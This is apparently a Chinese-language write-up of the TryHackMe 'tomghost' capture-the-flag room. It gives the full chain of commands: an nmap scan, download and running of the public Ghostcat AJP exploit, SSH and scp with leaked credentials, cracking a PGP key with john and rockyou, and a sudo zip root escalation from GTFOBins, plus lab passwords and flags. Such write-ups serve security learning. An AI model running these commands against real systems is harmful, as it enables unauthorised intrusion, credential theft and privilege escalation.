URL : https://tryhackme.com/room/tomghost
IP : 10.10.9.138
Scanning
nmap -A 10.10.9.138
- 有開的 port22 SSH 7.2ps
- 53 tcpwarpped
- 8009 AJP13 1.3
- 8080 Tomcat 9.0.30
Exploit
- 使用 searchsploit 搜尋 AJP
searchsploit AJP - 可以找到
Apache Tomcat - AJP 'Ghostcat File Read/Inclusionhttps://www.exploit-db.com/exploits/48143`wget https://www.exploit-db.com/download/48143``mv 48143 48143.py``python 48143.py`-
- 就直接噴出帳號密碼ㄌ帳號 :
skyfuck - 密碼 :
8730281lkjlkjdqlksalks
SSH 進去晃晃
ssh skyfuck@10.10.9.138- 發現家目錄裡面有兩個檔案
- 先抓出來
scp -r skyfuck@10.10.9.138:/home/skyfuck .在/home/merlin發現user.txt-THM{GhostCat_1s_so_cr4sy}
暴力破解 pgp
- 看到一個 asc 檔案 跟一個 pgp 檔案用 file 觀察他們在幹嘛
.pgp是加密後ㄉ東西.asc的是 private keypgp 轉 john-gpg2john tryhackme.asc > john_gpg- 備註 : gpg 是開源版本的 pgpref : https://zh.wikipedia.org/wiki/PGP我們要破的是
.asc的 private key 檔案求密碼用 john 爆破,With rockyou.txt-john john_gpg --wordlist=/opt/rockyou.txt 
- 破出密碼為
alexandru``gpg --decrypt credential.pgp- 輸入密碼 
取得 merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
提權
su merlin輸入密碼sudo -l-(root : root) NOPASSWD: /usr/bin/zip- 發現有 zip 的 sudo 權限到 GTFOBins 找 zip 提權方法- 可以 sudo 的
TF=$(mktemp -u) sudo zip $TF /etc/hosts -T -TT 'sh #'提權成功-
root.txt:THM{Z1P_1S_FAKE}